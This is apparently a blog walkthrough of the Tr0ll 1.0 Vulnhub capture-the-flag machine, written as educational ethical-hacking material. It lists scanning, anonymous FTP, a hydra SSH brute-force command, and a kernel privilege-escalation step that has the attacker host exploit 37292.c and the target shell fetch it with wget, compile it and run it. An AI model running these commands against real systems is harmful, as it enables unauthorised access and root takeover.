Home Capture the Flag Tr0ll 1.0 – Vulnhub CTF Challenge Walkthrough

Tr0ll 1.0 – Vulnhub CTF Challenge Walkthrough

by Unallocated Author

Tr0ll 1.0 is an intentionally vulnerable machine, which is more of a CTF like type than real world scenario. Nevertheless, this machine has its own difficulties and you can learn some new stuff from it. So, let’s start.

Enumeration Phase

Let’s first run netdiscover to find the IP of our machine.

netdiscover -r 192.168.1.1/24

After that, we run our typical nmap scan to see the open ports in the machine.

nmap -A -sS -Pn -vv [target]

Great we see many interesting stuff here. First of all, there is an open FTP port and we can connect to it with anonymous access. Also there is an open http port, we will run a nikto scan for it. The ssh port will be valuable later.

From the nikto scan we got an interesting /secret/ folder. When we get inside, we can understand why the machine got this name. Nothing interesting here, as you can see.

we got trolled

Let’s connect to the ftp server. When we get asked for the username we type ‘anonymous‘ and we leave the password field blank. That’s the anonymous access in an FTP server. With an ‘ls’ command we get a .pcap file. We save that to our machine for further inspection.

Okay, so now we need a program to read the pcap file. There are many programs such as wireshark or tcpdump, but I prefer tcpick, which prints the output in a readable and pretty format.

tcpick -C -yP -r lol.pcap

We, got some junk data and also a file with a directory name. Typing this directory , we get a file.

Download it and run the commands below to see the type and some basic info about the file.

file roflmao

strings roflmao

The file is a Linux self executable and in the strings command we got an address pointer. We type it in the browser and it shows us a new directory. Great.

Now we got two files in this directory. One seems to be a user list and the other contains the password. We still haven’t touched the ssh port. So now maybe it’s the time. Save the users in a .txt file.

*The password is the name of the password file(Pass.txt). Another troll from this machine.*

Exploitation phase

Fire up hydra against the ssh server.

hydra -L users.txt -p Pass.txt ssh://192.168.1.70

Great we got our credentials and now we can connect with ssh to get a user shell inside the machine.

ssh [email protected][target ip]

The only thing that’s left now is to elevate our privileges to get root. We type some basic commands in our shell to get all the information we need

sudo -l

We are not in the sudoers group so let’s see the kernel this machine has.

uname -a

With a little search with searchsploit we see that the kernel is vulnerable to a Privilege Escalation attack.

We will use the exploit ‘37292.c‘. Just copy this exploit to your apache directory and fire up your http service.

cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/usr/html

service apache2 start

Now in your shell go to the /tmp directory first and from there, download the exploit from your server. After that you just have to compile it and run it. That’s it we got root!

cd /tmp

wget http://[your ip]/37292.c

gcc 37292.c

./a.out

Also here is the flag of the machine inside the root folder.

cd /root

cat proof.txt

Good job, you did it!

Conclusions

This machine as I said before is more like solving a puzzle, the stuff that you’ll probably see in a CTF scenario. However, it’s a good exercise for beginners. You learned some basic commands about ftp anonymous login, directory enumeration, reading pcap files, getting information from a file, bruteforcing with hydra and also some very basic Privilege Escalation in Linux. Also, if you are into CTF’s, this is a typical scenario you’ll may come across.

 

Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive 95% discount HERE

You may also like

Latest Hacking News

Privacy Preference Center

Necessary

The __cfduid cookie is used to identify individual clients behind a shared IP address and apply security settings on a per-client basis.

cookie_notice_accepted and gdpr[allowed_cookies] are used to identify the choices made from the user regarding cookie consent.

For example, if a visitor is in a coffee shop where there may be several infected machines, but the specific visitor's machine is trusted (for example, because they completed a challenge within your Challenge Passage period), the cookie allows Cloudflare to identify that client and not challenge them again. It does not correspond to any user ID in your web application, and does not store any personally identifiable information.

__cfduid, cookie_notice_accepted, gdpr[allowed_cookies]

Advertising

DoubleClick by Google refers to the DoubleClick Digital Marketing platform which is a separate division within Google. This is Google’s most advanced advertising tools set, which includes five interconnected platform components.

DoubleClick Campaign Manager: the ad-serving platform, called an Ad Server, that delivers ads to your customers and measures all online advertising, even across screens and channels.

DoubleClick Bid Manager – the programmatic bidding platform for bidding on high-quality ad inventory from more than 47 ad marketplaces including Google Display Network.

DoubleClick Ad Exchange: the world’s largest ad marketplace for purchasing display, video, mobile, Search and even Facebook inventory.

DoubleClick Search: is more powerful than AdWords and used for purchasing search ads across Google, Yahoo, and Bing.

DoubleClick Creative Solutions: for designing, delivering and measuring rich media (video) ads, interactive and expandable ads.

doubleclick

Analytics

The _ga is asssociated with Google Universal Analytics - which is a significant update to Google's more commonly used analytics service. This cookie is used to distinguish unique users by assigning a randomly generated number as a client identifier. It is included in each page request in a site and used to calculate visitor, session and campaign data for the sites analytics reports. By default it is set to expire after 2 years, although this is customisable by website owners.

The _gat global object is used to create and retrieve tracker objects, from which all other methods are invoked. Therefore the methods in this list should be run only off a tracker object created using the _gat global variable. All other methods should be called using the _gaq global object for asynchronous tracking.

_gid works as a user navigates between web pages, they can use the gtag.js tagging library to record information about the page the user has seen (for example, the page's URL) in Google Analytics. The gtag.js tagging library uses HTTP Cookies to "remember" the user's previous interactions with the web pages.

_ga, _gat, _gid